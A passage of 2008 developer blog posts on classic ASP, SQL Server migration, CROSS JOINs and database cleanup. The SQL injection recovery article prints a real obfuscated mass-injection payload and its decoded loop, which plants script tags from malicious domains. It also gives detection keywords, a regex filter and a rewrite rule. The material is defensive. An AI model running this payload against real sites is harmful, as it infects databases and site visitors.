There is a helpful conversion tool within IIS that appears in a new tab under each site to convert
your current files to the new format if you don't want to do it by hand.

4. ADO Connection Strings

If you are using an MDAC connection string to connect to an MS SQL database such as:

DRIVER={SQL Server}; SERVER=server_name_or_address;
DATABASE=database_name; UID=username; PWD=password;

You will need to change it to SQLOLEDB as MDAC is not supported on 64 bit windows
systems.

PROVIDER=SQLOLEDB; SERVER=server_name_or_address;
DATABASE=database_name; UID=username; PWD=password;


5. Issues related to changing to an SQLOLEDB connection string.

Changing to the SQLOLEDB provider will mean that you may have problems with SQL that returns multiple recordsets, either client side or server side SQL or stored procedures.

For example with the MDAC connection string, a client side SQL statement like the one below in an example piece of ASP code would work fine.

NOTE the two SELECT statements in the SQL and the objRS.NextRecordset statement against the resulting recordset.


strSQL = "DECLARE @vals varchar(2000); " &_
  "SELECT @vals = COALESCE(@vals + '''', '''', '''''''') + CAST(a.CategoryFK AS varchar(10)) " &_
  "FROM DATA_CATEGORIES_VALUES as a " &_
  "WHERE a.IDFK = 3556 AND " &_
  "a.DataTypeFK = 'JEB';" &_
  "SELECT @vals as val;"

Set objRS = objConnection.Execute(strSQL)

'* move to the next recordset as the first one just builds the string,
'* but it's the 2nd one that returns the values
Set objRS = objRS.NextRecordset

If Not(objRS.BOF AND objRS.EOF) Then
 val = objRS("val")
End If

However using the SQLOLEDB provider will result in an error such as

“Operation is not allowed when the object is closed”

when it tries to move to the next recordset.

I believe that this is caused because within the temporary stored procedures that are created to run client side SQL don't include a “SET NOCOUNT ON” statement which is the first recordset but this line is automatically included by the SQLOLEDB provider and therefore there is no need to move to the next recordset as only one is returned anyway.

Set objRS = objRS.NextRecordset

Using “SET NOCOUNT ON” means that the first recordset implicitly returned by SQL server containing the number of rows affected by the first SELECT statement is not returned.

This would be the case for any SELECT statement that does not itself return a dataset.

6. Stored Procedures and SQLOLEDB

Stored procedures which do not have the SQL statement “SET NOCOUNT ON” at the top of it's code block may also now cause problems if they return multiple recordsets with data and you may get “Operation is not allowed” or “Item does not exist with this name or ordinal” errors when trying to reference the recordset object in your client side code.

Including “SET NOCOUNT ON” at the top of stored procedures is good practise anyway and since SQL 2005 it's part of the default stored procedure template. Therefore any procs that don't include it should be updated to include it to prevent these sort of issues.

7. Returning BLOBS (varchar(max), nvarchar(max), text, ntext etc)

A benefit to changing to the SQLOLEDB provider is that you no longer have to put your BLOBS at the end of your SELECT statements (e.g nvarchar(max), varchar(max), ntext, text).

Previously you had to put these columns at the end of the SELECT statement after any non BLOB columns to prevent them from being returned empty e.g:


SELECT CandidateID, Name, DOB, Town, County, Blob1, Blob2, Blob3


With SQLOLEDB you do not have to do this as it seems to handle them better than MDAC so the following will return values for the BLOB columns even though they are not at the end of the SELECT.


SELECT CandID, Name, Blob1, Blob2, Blob3,  DOB, Town, County

These are the main configuration issues I found when moving to a 64 bit environment but please post any comments if there are other issues related to migrating IIS web applications from 32 to 64 bit platforms.

I am sure there are plenty more!

By Strictly-Software


© 2008 Strictly-Software

Sunday 7 September 2008

When would you use a CROSS JOIN

Cross Joins??

Like most people I would imagine when I first heard about Cross Joins in SQL many years ago I remember thinking to myself when would I ever find myself
in a situation developing a website where I'd make use of them. They are one of those features that are infrequently used in day to day web development
but I over time I have come across a few situations where they have been very useful and solved some specific problems. I'm sure there are many
more that can be mentioned but I will talk about 2 specific situations where I have made use of them recently.


1. Many to Many Save

On nearly all of my sites I have one or more pages that output the results of some sort of search that the user has made on a previous page.
On the results page the user can select one or more of these records to view in more detail through selecting them with a checkbox or highlighting
the row with a double click etc. On some sites however I also have a folder option that allows the user to save those selected records into a new or
existing folder/group for later use. For example taking a jobboard as an example the user could select 3 candidates "Mr Smith, Mr Jones and Mr Robins"
from the results and then select 2 folders to save these candidates to "Top Candidates, Tuesdays Selections".
In the old days before I fully understood the flexibility and power of SQL I would do something like the following

(pseudo code)

For Each Candidate in Selected Candidates
For Each Folder in Selected Folders

'* Execute SQL either in a proc or inline
INSERT INTO CANDIDATE_GROUPS
(Folder, Candidate)
VALUES
(Folder, Candidate)

Next Folder
Next Candidate


Which for my example would involve 5 loop iterations, 5 separate calls to the database and then 5 separate insert statements. Obviously if you were
selecting more candidates and more folders this would increase the number of loops.

What always do nowadays is collect the two strings of delimited values and then call a stored procedure once passing the strings as parameters.
Then making use of my SPLIT user defined function I simply use a cross join to populate the table.

usp_asp_save_candidate_groups
@Candidates varchar(1000),
@Groups varchar(1000)
AS

SET NOCOUNT ON

INSERT INTO CANDIDATE_GROUPS
(Folder, Candidate)
SELECT a.[VALUE],b.[VALUE]
FROM dbo.udf_SPLIT(@Groups,',') as a,
dbo.udf_SPLIT(@Candidates,',') as b


This way I have reduced the application code to the bare minimum and we only have one INSERT statement. The overhead is now the CROSS JOIN and the SPLIT functions that convert a string of delimited values to a TABLE variable however this is always going to outperform nested loop inserts by a mile. Even though the SPLIT function makes use of multiple INSERTS to populate the TABLE variable that's then selected from the CROSS JOIN code outperforms the nested loops by factors of 20+ from tests I have run. Plus you are reducing network traffic and simplifying your application code.


2. Matrix Table

On a recent jobboard website I had to come up with a matrix table so that the user had access to the number of live jobs in the system for every possible category combination. You may have seen the sort of thing I mean where you have a filter form that lists job related categories with
the number of jobs in brackets to the side of them e.g

Job Type
-Full Time (50)
-Part Time (23)

Sector
-Management (4556)
-IT (3434)
-Sales (2456)

The page had to load fast so I didn't want to calculate the counts on the fly and there were 10 category types with over 150 categories that could be saved against a job in any possible combination. This meant that that as the user narrowed down his or her job search the counts had to reflect the options already selected. The first idea was to create a matrix table that would hold a row for each possible combination and a column for the number of jobs.

JobSector JobType Industry Region Location Role LiveJobs
12 8762 562 992 NULL NULL 345
12 8762 562 993 NULL NULL 321
12 8762 562 994 NULL NULL 78
12 8762 562 995 NULL NULL 963
12 8762 562 996 NULL NULL 13

This would have allowed me to do a simple statement such as

SELECT LiveJobs FROM MATRIX WHERE JobSector=12 AND Region=992

to get the number of live jobs per category combination.


Finance job in Afghanistan anyone?

So I knocked up some SQL to test how quick it would take to generate this matrix and clicked the run button. However it soon came apparent that this wasn't going to work as well as expected. After an hour or so the transaction log had filled the disk up and we had only populated 30 million or so rows out of some stupidly high number running into the billions.
I quickly decided this wasn't the way to go. Apart from the problems with generating this matrix table quickly most of the possible combinations were never going to actually ever have
a job count greater than 0. I doubt many UK based jobboards have ever posted jobs in the Private equity and venture capital sector based in Afghanistan so it seemed a pointless overhead trying to generate category combinations that would never be accessed.

So after a re-think I decided to rewrite the matrix using CROSS JOINs to populate the table so that instead of holding all possible category combinations it would only hold category combinations that were actually saved against the job. If a job was saved with only one category
for each possible category type then there would only be one row in the matrix table for that job. If however one category type had 3 options selected and all the rest one then there were be 3 rows and so on. This meant we would only ever hold data for categories being used and the table would be as small or as large at it needed to be.

A cut down version of the finished SQL that creates the matrix table is below. I have a working table #SITE_JOB_CATEGORY_VALUES that holds each job and each saved category ID and from the first SELECT that outputs the job ID it CROSS JOINS each possible derived table
to get all the combinations of saved category values against that job.


INSERT INTO SITE_JOB_CATEGORY_MATRIX_A
(JobPK,JobSector,JobType,Industry)
SELECT sjcv.JobFK,a.JobSector,b.JobType,c.Industry
FROM #SITE_JOB_CATEGORY_VALUES as sjcv,
(
SELECT a.JobFK, CategoryFK as JobSector
FROM (SELECT @JobPK as JobFK) as a
LEFT JOIN #SITE_JOB_CATEGORY_VALUES as b
ON b.JobFk = a.JobFK
AND CategoryTypeFK = 2248
) as a ,(
SELECT a.JobFK, CategoryFK as JobType
FROM (SELECT @JobPK as JobFK) as a
LEFT JOIN #SITE_JOB_CATEGORY_VALUES as b
ON b.JobFk = a.JobFK
AND CategoryTypeFK = 2249
) as b ,(
SELECT a.JobFK, CategoryFK as Industry
FROM (SELECT @JobPK as JobFK) as a
LEFT JOIN #SITE_JOB_CATEGORY_VALUES as b
ON b.JobFk = a.JobFK
AND CategoryTypeFK = 2190
) as c
GROUP BY sjcv.JobFK,a.JobSector,b.JobType,c.Industry


The reason that each derived table selects first from a constant and then LEFT JOINS to the main category table is that each derived table needs to return a value even if its a NULL otherwise the other derived tables wouldn't join to it and I'd lose the row for that job.

Depending on how many categories were selected under each category type (as some options allow multiple select) one job could have 1 or multiple rows with all the variations possible.

For example this job has one category value per category type apart from Region and Location that have 2 each which means there is a total of 4 rows to be outputted into the matrix.

JobPK JobSector JobType Industry Region Location Role
3434 12 8762 562 992 3543 78
3434 12 8762 562 993 3543 78
3434 12 8762 562 992 3544 78
3434 12 8762 562 993 3544 78

To get the job count you would just do a DISTINCT on the JobPK and the WHERE contains the columns and values that the user is filtering by.

The application references this table through the use of a SYNONYM as behind the scenes there will be 2 of these matrix tables. The current one and then every 15 minutes an MS Agent job runs that creates the new matrix and once done it points the SYNONYM to it and drops the existing table.

Using this approach I can rebuild the matrix table every 15 minutes in a manner of seconds. I have a clustered covering index on all the columns ordered by the most selective categories to the least and I can output the job count per category and run database searches using the users selections in lightening speed. The only downside is that there is a 15 minute delay between a job being posted on the site and it being searchable but that seems to be an acceptable limit to the posters.

So those are just two uses of a CROSS JOIN I have used lately and I am sure there are many more useful implementations. If you have any more please lets hear about them.

Friday 5 September 2008

Before we rewrite all those ASP Classic sites as .NET

What Language Should I use?

Although .NET is the way a large percentage of websites are going I still find a lot of them surprisingly slow. As a developer you are always wanting to work with the newest technologies getting to spend time learning new languages to boost your CV and work with whatever is cutting edge at the time just for the fun of it. However most of all developers work for someone and a lot of the time the customer your sales team sell to doesn't care if the site they are paying for is written in PHP, ASP.NET or ASP Classic as long as it works, is fast and doesn't break every time more than 10 people visit it at the same time.


The Quickest .NET Site Development in History

My boss used to joke that we should upgrade one of our biggest sites from classic ASP to .NET but rather than rewriting it all we should just change all the file extensions from .asp to .aspx. We used to laugh about this thinking it would be a good way to get a .NET site up quickly that was faster than our competitors with no development costs. However it was only a pie in the sky joke until recently when we actually sold a version of this software to a foreign company who wanted control of the source code.

A few months later when one of their management team spoke to my boss he proudly informed him that they had indeed rewritten the whole system in .NET and paid a lot of money for doing so. My boss informed him that if they had done so that quickly we would like a copy ourselves as it would save us some time re-developing the system having taken 2+ years to get to the stage we were currently at when we sold it.

We all eagerly gathered round the nearest PC and entered the URL to examine this marvel of technology that had only taken 2 months for a complete rewrite. Imagine our surprise when we were met with the exact same site not just the look and feel but the exact same site structure, page layout, CSS styling, client side JavaScript and so on. The only difference we could find was a new sub directory that used the companies name before our existing site structure and all the pages were now renamed .aspx.

We got some of our .NET developers down to view the source code and found nothing that indicated it had been generated by .NET cod and in fact it looked exactly like the classic ASP source code including some secret debug code generated by ASP that I had outputted in specific places hidden in HTML comments. Nothing had changed apart from the extensions!

We reckoned that maybe the Indian team that had been given the contract for the rewrite had taken one look at how much code there was and how complicated it would be to even understand without any training let alone rewrite that they took the decision my boss had batted around as a joke.

Of course we no longer had access to their servers so we couldn't confirm 100% that it had been a file extension change and nothing else. Maybe they had in fact re-written the whole system in .NET and reproduced every single feature that was already there in the exact same way as before including all my debug statements and client side JS code that was generated by the system. If that was the case then what was the benefit to the client? They had just forked out a huge bill for a rewrite with no visible benefit. Another indicator that the site hadn't been rewritten was that it was still as fast as it was previously so I would give pretty good odds that the Indian outfit that had the contract made a very easy £20k or so.

My point being is if you have a system that is performing well and is earning your company £££ with constant sales then does the language its written it actually make much of a difference to the sale of that product. Wouldn't the speed, reliability and development time required to get it up and running be more important in the customers mind or is that .asp extension just considered too old and unfashionable nowadays in the small percentage of customers minds who even know the difference between .asp .aspx ?

And if you do have a customer that gets all panicky about those .asp extensions you can always use ISAPI URL rewriting to remove any mention of .asp or .aspx. Remember a fast well performing site is just that and the customer is probably not as bothered as you whether its been developed in classic ASP, .NET 3, PHP, Java or the next 3 lettered acronym language that comes along.

As a developer you may want to rewrite existing sites each time a new sexy technology comes out but unless there are desirable benefits to the company that pays your wages in doing this then its not going to happen. If you work for a small company then the time and money lost by taking a developer away from new work to rewrite an existing system is not going to be cost effective.

However saying that you might have a good case in convincing your boss to put that effort in a rewrite and there will always be tech savy customers out there who pay money over fist for the latest code base just like uber rich fashionistas that only wear the same clothes once. However before you do upgrade your classic ASP system try and see if you get it to perform as fast as it possibly can first. There's a high chance that a lot of classic ASP systems have a lot of bad code contained within them that could be tweaked to improve performance with a little work.

I work on a number of large high volume traffic sites that are still using classic ASP and have spent considerable time trying to get the best performance out of them as possible as a rewrite in .NET is going to take some considerable time and effort. If I have a poorly performing site then the steps I would go through on the way to a redevelopment are these:

1. Improve the ASP application code as much as possible. See top 10 tips for improving ASP sites.

2. Make sure the database is performing as well as possible and returning data to the application as quick as it can. View my top tips for increasing SQL performance article.

3. Make sure your hardware and software is configured correctly and that you don't have problems with the servers setup.

4. Consider moving to a 64 bit server and put more RAM in. See tips for moving from 32 to 64 bit server.

5. If all the previous have failed and you still do not have a scalable site that can take large amounts of traffic then consider a rewrite in .NET.

However there maybe some fundamental issue in the applications design or site structure that is causing problems. If so then a redesign is required anyway. Creating and maintaining scalable high volume sites in ASP classic is possible but requires some skill and knowledge. You need to weigh up the cost to the company in time and money that a total redesign and redevelopment would take opposed to any gains made by performance tuning and adding extra hardware.

Thursday 4 September 2008

Script - Find Text in Database

Find and replace text in database

The following procedure is a very useful stored procedure that is my first port of call when I am tasked to investigate sites that have fallen victim to SQL injection attacks. The script has 4 different methods which are outlined in the comments. However I would first use method 1 which will output a list of any tables and columns within the database and the number of rows that contain the offending hack string. From that data you can then decide whether you need to run the other methods that either output all UPDATE statements needed to remove the hack or run them straight off. The other method outputs every single affected row within the database which is useful as you can determine whether a clean will work or not by the placement of the injected code.


Script Details

I have created 2 versions of the proc one for SQL 2005 and one for 2000/7. The only real differences are that I can use NVARCHAR(max) in the 2005 version and the system views are slightly different.
You could choose to update the 2005 version to use the CLR and a regular expression UDF to speed up the text searches.

Download SQL 2005 Version

Download SQL 2000 Version


Searching and replacing multiple strings

I have also created another script that allows you to search for and if necessary replace multiple strings in one go. Some sites are charging $300 for code like this and you may have even seen the adverts on this site :). So if I have saved you or your company some money then please feel free to make a donation!.

Download code to search and replace for multiple strings

I have added a branch within this proc that checks the version of SQL server and calls the appropriate proc. However you are probably only going to want to use the procedure that your server supports so comment out or remove the following code:


IF patindex('%SQL Server 2005%',@@Version)>0
SELECT @SQL_VERSION = 2005
ELSE IF patindex('%SQL Server 2000%',@@Version)>0
SELECT @SQL_VERSION = 2000


And also further down within the loop remove the call to the proc that your not using.


IF @SQL_VERSION = 2005
BEGIN

EXEC dbo.usp_sql_find_text_in_database
@Mode,
@Value,
@ReplaceString
END
ELSE
BEGIN

EXEC dbo.usp_sql_find_text_in_database_2000
@Mode,
@Value,
@ReplaceString
END




Example Usage
So you need to hunt down and remove the following injected hack strings:

<script src="http://www.usaadp.com/ngg.js"></script>
<script src="http://www.bnsdrv.com/ngg.js"></script>
<script src="http://www.cdport.eu/ngg.js"></script>

Just call the usp_sql_find_multiple_text_in_database proc in the following way




EXEC dbo.usp_sql_find_multiple_text_in_database
@MODE = 4,
@FindString = '<script src="http://www.usaadp.com/ngg.js"></script>||<script src="http://www.bnsdrv.com/ngg.js"></script>||<script src="http://www.cdport.eu/ngg.js"></script>',
@SplitOn = '||',
@ReplaceString = ''


Which will hunt for each string in turn in all textual columns (char,nchar,nvarchar,varchar,ntext,text) and replace it with an empty string.

If you don't want to carry the UPDATE out straight away you could use a different option by changing the @MODE flag:

1 = Output an overview list of each table and column containing the string and the no of rows found for each. This is a good way of checking how much data has been corrupted.

2 = Output all the rows containing the string. This may be quite a lot if your whole database has been comprimised.

3 = Output the update statements needed to remove the string.

4 = Find and replace all occurrances of the string.


So there you go a way to clean up your infected SQL databases and save yourself $299 at the same time. As I am saving you some money buying a clean up product and possibly lots of money due to lost business revenue then please consider making a donation so that I can continue publishing scripts like this for free.






Wednesday 3 September 2008

Recovering from an SQL injection hack

Are SQL injection Attacks on the increase?

SQL injection attacks seem to be on the rise lately not because there are more dedicated hackers spending time trying to exploit sites but because most of the successful attacks are caused by bots that trawl the net 24/7 hammering sites. Now we all supposedly should know by now how to prevent SQL injection from affecting your systems but if you have a large back catalogue of older sites that were created years ago that are still in production then they are going to be very vulnerable in the current climate. Even if these sites receive little or no traffic normally if they are accessible on the Internet they are much more likely to become victim because of these bots.

This article will look at the various ways of preventing and recovering from an attack without having to spend months re-writing all those old sites to future proof them. If people still use these old sites then they should be expected to work and not greet the user with Googles Reported Hack Site page. However we all know time is money and the money is in new developments not rewriting that old online ladies shoe catalogue that was written in 98.


Latest forms of SQL Injection

Currently the biggest automated SQL injection attack comes from derivatives of the following:
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20NVARCHAR(4000));EXEC(@S);


Which tries to obfuscate the main section of the code by using a local variable to hold an encoded string that is then decoded and executed. If we decode the main section we can see that the code is making use of the system tables to loop through all textual columns and inserting script tags that reference a compromised site.
;DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www.vtg43.ru/script.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.vtg43.ru/script.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor


There are numerous variations of this hack with the major differences being
-The URI of the SCRIPT tag injected into the columns.
-The name and datatype of the main variable.
-Whether the UPDATE statement inserts the SCRIPT tag at the start or end of existing data or overwrites it totally.

See my post latest SQL injection URIs for a list of the sites currently doing the rounds.

So before we look at the various hack sticking plasters that can be applied lets just clarify that the best way to avoid SQL injection is to design and develop your site following best practise guidelines.

The best security is a layered approach that involves multiple barriers to make these pesky bots life as difficult as possible. So just to ensure that you all know that I am not recommending a plaster as the number 1 SQL injection prevention method I will just summarise some of the best practises that should be utilised when developing new systems.


Prevention with good design.

The following should all be common knowledge by now as SQL injection is not some newly discovered threat against web kind but has been around and evolving for many years. When developing new sites or upgrading legacy systems you should try to follow these basic rules as developing with this threat in mind as apposed to an after thought will always be the best mode of prevention.
  • Validate all input taken from the client application that is to be passed to the database using a white list rather than blacklisting approach. This basically means rather than stripping out certain characters and symbols only allow those that the field you are updating requires. This means checking the data type and length of the value and handling anything inappropriate.
  • Use stored procedures or parametrised queries. Let ADO handle any data type conversions and quote escaping. If you are used to building up strings to execute then this means you have to rely on your own foolproof coding skills to ensure that each value appended to the string is the correct format and escaped correctly. You may think that you would never make such a stupid mistake as to forget to validate each value you add to the string but say you were off ill one day or on holiday and a junior or a colleague had to make an edit to a page on your site. For example if the required amend is to add a listbox to a page that lists news articles to allow the user to filter by a particular news category that is identified and retrieved from the database using an integer. If they forget to validate the value supplied from the listbox to make sure it was an integer then you can be guaranteed that one of these automated hack bots will exploit it within days if not hours of the change going live. I have had this exact same situation happen myself on a major system. When the change made by my colleague went live at 11pm at night by 7am the following morning the whole site had been compromised because of this one lapse in their concentration. If you think that using command objects and parameters are too long winded and complicated to write then create yourself a helper script that will make use of the commands parameter.refresh method to build the code up you require.
  • Only grant the database logon that the website users connect with the minimum privileges they require. Don't give them automatic write access and make sure all your CUD (create, update, delete) operations are carried out from stored procedures that the user has execute permission on. I know a lot of people do not like the overhead of creating a stored procedure for simple SELECTs that may only exist to populate a dropdown and therefore use a mixture of stored procedures and client side dynamic SQL which is fine but by following this rule then even if the hacker finds a hole in one of your client side SELECT statements to exploit they would not have the sufficient privileges to update the database.
  • If you have to use dynamic SQL in stored procedures that accept values from the site then use sp_executesql and not exec. A hacker could still exploit your system if you executed an unvalidated string within a stored procedure using exec(). You will also gain benefits from the system caching and therefore reusing the generated query plans when you use this system procedure to execute your dynamic SQL instead of exec.
  • Make life hard for the hackers and don't show detailed error messages to your users when something goes wrong. Although the automated hack bots are using brute force to hit every possible URL and parameter possible in the hope of finding a hole a dedicated hacker probing your site feeds off the details provided to him when he comes across a 500 error. Although its still possible to exploit a site in the blind its a lot harder and more time consuming than having the details of the SQL you are manipulating in front of you. Its amazing how many sites I still come across that show the SQL statement in the error messages. In fact a very popular developer resource site (I will mention no names) that hosts message boards and technical articles including some about SQL injection best practises continues to show me the SQL statement it uses to log members in when I visit and it times out. End users do not need to see this information as its dangerous. Show them a nice friendly error message and then email yourself the details or log them to a file or database if you really need to know what caused the error.

Oops someone just hacked your site.


So you have just had a phone call from an angry customer complaining about a virus they have just been infected with because they still use IE 5 to browse the web and they have just visited the home page of their site that your company hosts. Or maybe you have received one of Googles nice warning messages when you try to access the site yourself. Or maybe you just noticed the layout is screwed up because of broken tags and truncated HTML due to newly inserted SCRIPT tags that shouldn't be there. However you found the wonderful news out that your site has been exploited you need to get moving as fast as possible and you need to know 2 main things:
1. How did they managed to hack the site.
2. How much data has been compromised or even worse deleted.


Find the hole in the system.

There are many security and logging systems available for purchase but I have a custom logging system on my sites that at the bottom of each page will log to a separate database some core information about the user and the page they are on (user-agent, client IP, URL etc) as well as using this for reporting traffic and user statistics I have columns called IsHackAttempt and IsError and a timed MS Agent job that every 15 minutes looks at the last 15 minutes of unchecked traffic data and checks the query-string for common SQL/XSS injection fingerprints. If it finds any then I update the IsHackAttempt flag.

This enables me to run a report of all hack attempts over a set time period. You may find on large systems that you are constantly under attack from these bots so you should look for hack attempts that have been on pages that have just been updated or that have caused 500 errors. If you have SQL injection attempts that cause any sort of 500 error then you should investigate immediately as something is not right. If a hacker can raise an SQL error on your system then it means its highly probable they can manipulate your SQL probably due to incorrect parameter sanitization.

If you don't have your own custom logging system then you can either hunt through your log files using a tool such as Microsoft's Log Parser http://www.securityfocus.com/infocus/1712 or bulk load the log files into a database for easy searching using SQL.

Some keywords and terms you should be looking for in GET data that would indicate an SQL hack attempt would include: exec, select, drop, delete, sys.objects, sysobjects, sys.columns, syscolumns, cast, varchar, user, @@version, @@servername, declare, update, table.

Most hacks will be through the query-string and therefore you should be able to find the hack in the log file. Hacks from a posted request will not be discovered in the log file unless you have written a custom method to log POST data which I doubt many people do due to the overhead.


Use a bot to beat the bots
.

There are many tools out there which help you find holes in your site and unfortunately they are also used by hackers to find the holes in your site so do yourself a favour and beat them to it.

Before any site goes live you should run a tool such as Paros Proxy http://www.parosproxy.org which will crawl your site and output a nice report detailing all possible exploitable holes in your system. As well as SQL injection it will look for XSS, CRLF and many other possible hacks. Run this against your development system as running it on the production system will slow it down as well as possibly filling your database up with crap if you do have exploitable holes. Once you have run this tool view the report and investigate all pages that have been flagged as possible sources for a hacker to hit.


A database restore is not always the answer
.

The most common automated hacks at the moment involve an encoded SQL command that makes use of the system views available in SQL Server to output multiple UPDATE statements to insert a <script> tag in every possible text based column (char, varchar, nchar, nvarchar, text, ntext) in the database. This script will usually reference a .js file on some URL that tries to exploit well known holes in some older browsers through IFrames to download viruses and other spyware to the clients PC. Once you know the actual <script> tag that the exploit is using you can search your database to see how much data has been affected. It maybe that a backup restoration is not required and there is no point loosing customer data by restoring the last known safe backup when its not required.


Hunting for affected rows and columns
.

Using a script such as my find text within database script you can see how much of your data is affected. It maybe that the SQL run by the hacker reached its command timeout limit before it could affect all your tables and especially if you have a large database system only a small percentage of the data could be affected. Its also important to know whether the hacker has purposely or accidentally overwritten or deleted any data as well as inserting his <script> tag. I have seen hacks where the value for the column being updated was wrapped in a CAST(column as VARCHAR) statement which meant that anything after 30 characters was lost. This is because the default length when no value is supplied for a CAST Varchar/Char is 30 characters long. This would mean your column would contain your reference to the virus infected site and nothing else and in this case a simple replace would not be helpful as even if you removed it you would still be missing data.

If the hacker has only inserted the <script> at the start or the end of the existing text which seems to be the most common type then we can easily remove the offending HTML by either using a script like my find and replace or reversing the code that the hacker used in the first place.

To reverse engineer the exploit you should URLDecode the string, remove any EXEC(@s) statement at the end so you don't accidentally run it again and replace it with a PRINT or SELECT so that when you run the SQL you will actually see the CURSOR/LOOP that the exploit is using. You can then replace the hackers UPDATE statement with one that REPLACEs the injected code with nothing.


Preventing re-infection.

Now we have removed the offending HTML or Javascript we need to ensure that we don't get re-infected. If we haven't managed to find the code that allowed the hacker in and we haven't got time to either check each page or rewrite the code to future proof it then we need some sticking plasters until we do get time. I wouldn't recommend the following approaches as the only way to prevent SQL injection. However if you have a number of old sites on a server that have holes and are repeatedly getting hit then they will most certainly help filter out a large percentage of possible hack attempts and they could also be used as another layer in your multi layered security approach.


Identify those bad bots and redirect them away from your site.

If you have been logging your users and hackers then you could try blocking future hackers in a number of ways.

  • Block IP addresses that have been the source of hack attempts at your firewall. However the problem with this is that the IP addresses will change constantly and you are blocking after the attack has occurred.
  • If your site is supposed to be a local or regional site e.g a UK jobs board then you may decide that only traffic from the UK or Europe should be allowed. You could identify the countries that generate the most hack attempts from your traffic data and then block ranges belonging to those countries. To find out the IP ranges for any country use a site such as Country IP Blocks. The problem with this approach is that in a global economy legitimate traffic could come from anywhere in the world and although China seems to be the source of the majority of the current hackbots it is also going to become the worlds major economy in the next few years so blocking the whole country may not be the best approach.
  • Block by user-agent. This will only work for those hackers that don't spoof legitimate browsers and use easily identifiable agents such as Rippers or Fake IE. Why would a legitimate user have a browser named Fake IE?? I do not know either but you could block either through application code or through an ISAPI rewrite rule. There is no point using robots.txt as any hacker worthy of the name is going to ignore that.

Identify hackers as they attack your site.

Create a global include file that can be referenced by all your pages and place it at the top of all other includes so its the first piece of code run by your site. Create a function that takes the Request.Querystring and Request.Form as parameters and check for common SQL injection fingerprints. If found redirect the user to a banned page.

I have also heard the idea that on this banned page you could try and gain some revenge by running an SQL WAIT statement to consume the attackers connection time and slow them down a tad. However if you have a limit on the number of concurrent open database connections and you are being hammered by a zombie botnet then you are going to consume your connections with these WAIT commands which will be detrimental to your other legitimate visitors. This could also be used against you as a form of SQL Denial of Service attack as if a user could automate a series of requests to these pages knowing that you have a connection limit then once all the connections have been used up your site is basically out of action until a connection is released. On a database driven site this is something to be very aware of.

A message on the page informing them that they have been identified and logged will not do much good either considering most of these bots originate overseas and come from anonymous proxies or unsuspecting users who have become members of a zombie network but its worth doing anyway just to scare those teenage hackers based in your own country who may be experimenting.

Your function could look a bit like this. The code is in VBScript due to its easy readability and I'm sure most people could convert it to their preferred language with little work.
Dim blBanUser : blBanUser = False
blBanUser = BanUser(Request.Querystring)
If Not(blBanUser) Then
blBanUser = BanUser(Request.Form)
End If

If (blBanUser) Then
Response.Redirect("/banned.asp")
End If

Function BanUser(strIN)

strIN = URLDecode(strIN)

Dim objRegExpr : Set objRegExpr = New RegExp

With objRegExpr
.IgnoreCase = True
.Global = True
.Pattern = "DECLARE @\w+ N?VARCHAR\((?:\d{1,4}|max)\)"
If .Test(strIN) Then
BanUser = True
Exit Function
End If
.Pattern = "sys.?(?:objects|columns|tables)"
If .Test(strIN) Then
BanUser = True
Exit Function
End If
.Pattern = ";EXEC\(@\w+\);?"
If .Test(strIN) Then
BanUser = True
Exit Function
End If
End With

Set objRegExpr = Nothing

BanUser = False
End Function
Rather than just logging attempted or successful hack attempts for reporting later this type of plaster will prevent the most common SQL injections that are currently being executed by bots. I found that after implementing this function on a site that was receiving up to 2000 hack attempts each day it dropped down to 2-5 per day.

The problems with this approach are that it will slow down the response time of your site as every page load is going to have to perform these checks and the more data you submit the more there is to check. You could extend it but the more checking you do the slower it will get.

You may also decide that as the majority of hacks come through the query-string that checking the post data is not required. Also this method only checks for a few fingerprints and the SQL injections are changing all the time. It may catch 99% of the attacks currently out there but who is to say that a new type of attack that doesn't use those system tables or exec won't be rolled out in the following days. This is why some sort of logging and hack identifying system is advisable as it means you can see the types of attack that are being used against you and then modify any defensive regular expressions as required.


ISAPI Filtering.

If you have the ability to add ISAPI rewriting to your site then you can place rules that do similar regular expression fingerprint checks as the function above but before any application code is run by placing rules in an httpd.ini or .htaccess file. You can do this for one site or for the whole server.

The benefits of using ISAPI rewriting is that it will be faster than getting your application to check for hack fingerprints plus you can apply the plaster to the whole server in one hit for maximum affect. The downside is that you can only check the query-string and not the post data. You also have the same issues about injection methods changing and having to update the file.

You could use the following 3 rules to prevent the majority of the automated hack bots at the moment. I have implemented these rules on my own sites and it has reduced the amount of hacks that get logged by roughly 95%.
# SQL INJECTION FINGERPRINTING
RewriteRule /.*?\.asp\?.*?DECLARE[^a-z]+\@\w+[^a-z]+N?VARCHAR\((?:\d{1,4}|max)\).* /jobboard/error-pages/banned.asp [I,L,U]
